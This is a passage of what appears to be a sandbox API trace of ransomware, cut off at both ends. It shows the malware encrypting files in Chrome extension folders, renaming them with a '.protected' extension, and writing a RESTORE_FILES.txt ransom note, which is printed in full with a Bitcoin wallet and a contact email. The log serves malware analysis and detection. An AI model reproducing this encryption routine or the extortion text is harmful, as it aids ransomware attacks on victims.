Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.187] StrStrIW (lpFirst="index.html", lpSrch=".protected") returned 0x0 [0083.187] lstrcmpW (lpString1="index.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.187] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.187] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.188] StrStrW (lpFirst="index.html", lpSrch=".txt") returned 0x0 [0083.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.188] StrStrW (lpFirst="index.html", lpSrch=".rar") returned 0x0 [0083.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.188] StrStrW 
(lpFirst="index.html", lpSrch=".zip") returned 0x0 [0083.188] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x828, lpOverlapped=0x0) returned 1 [0083.196] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff7d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.196] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x828, lpOverlapped=0x0) returned 1 [0083.196] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.197] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.197] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.197] CloseHandle (hObject=0x164) returned 1 [0083.197] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.protected") returned 170 [0083.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.protected")) returned 1 [0083.198] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="Windows") returned -1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="Program Files") returned -1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="Program Files (x86)") returned -1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="$Recycle.bin") returned 1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="System Volume Information") returned -1 [0083.198] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.198] StrStrIW (lpFirst="offers.html", lpSrch=".protected") returned 0x0 [0083.198] lstrcmpW (lpString1="offers.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.198] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.198] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.199] StrStrW (lpFirst="offers.html", lpSrch=".txt") returned 0x0 [0083.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.199] StrStrW (lpFirst="offers.html", lpSrch=".rar") returned 0x0 [0083.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.199] StrStrW (lpFirst="offers.html", lpSrch=".zip") returned 0x0 [0083.199] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.200] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.200] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.200] SetFilePointerEx (in: 
hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.200] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.201] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.201] CloseHandle (hObject=0x164) returned 1 [0083.201] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.protected") returned 171 [0083.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.protected")) returned 1 [0083.203] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="Windows") returned -1 [0083.203] lstrcmpiW (lpString1="setup.html", 
lpString2="Program Files") returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="Program Files (x86)") returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="$Recycle.bin") returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="System Volume Information") returned -1 [0083.203] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.203] StrStrIW (lpFirst="setup.html", lpSrch=".protected") returned 0x0 [0083.203] lstrcmpW (lpString1="setup.html", lpString2="RESTORE_FILES.txt") returned 1 [0083.203] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.203] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.204] StrStrW (lpFirst="setup.html", lpSrch=".txt") returned 0x0 [0083.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.204] StrStrW (lpFirst="setup.html", lpSrch=".rar") returned 0x0 [0083.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.204] StrStrW (lpFirst="setup.html", lpSrch=".zip") returned 0x0 [0083.204] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.205] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.205] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.205] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.205] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.205] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.205] CloseHandle (hObject=0x164) returned 1 [0083.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.protected") returned 170 [0083.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.protected")) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0083.206] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0083.206] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\RESTORE_FILES.txt") returned 167 [0083.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x160 [0083.207] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.207] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0083.208] lstrlenA (lpString="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") returned 684 [0083.208] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0083.208] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.208] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0083.208] CloseHandle (hObject=0x160) returned 1 [0083.208] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="Windows") returned -1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="Program Files") returned -1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="Program Files (x86)") returned -1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="$Recycle.bin") returned 1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="System Volume Information") returned -1 [0083.208] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned 158 [0083.208] lstrcmpW (lpString1="cloud_route_details", lpString2=".") returned 1 [0083.208] lstrcmpW (lpString1="cloud_route_details", lpString2="..") returned 1 [0083.208] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*") returned 160 [0083.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0083.209] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.209] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.209] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.209] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.209] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.209] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\.") returned 160 [0083.209] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.209] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.209] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.209] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.209] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\..") returned 161 [0083.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.209] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) 
returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="Windows") returned -1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="Program Files") returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="Program Files (x86)") returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="$Recycle.bin") returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="System Volume Information") returned 1 [0083.209] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.209] StrStrIW (lpFirst="view.html", lpSrch=".protected") returned 0x0 [0083.209] lstrcmpW (lpString1="view.html", lpString2="RESTORE_FILES.txt") returned 1 [0083.209] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.209] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.210] StrStrW (lpFirst="view.html", lpSrch=".txt") returned 0x0 [0083.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.210] StrStrW (lpFirst="view.html", lpSrch=".rar") returned 0x0 [0083.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.210] StrStrW (lpFirst="view.html", lpSrch=".zip") returned 0x0 [0083.210] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x174c, lpOverlapped=0x0) returned 1 [0083.219] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffe8b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.219] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x174c, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x174c, lpOverlapped=0x0) returned 1 [0083.219] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.219] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, 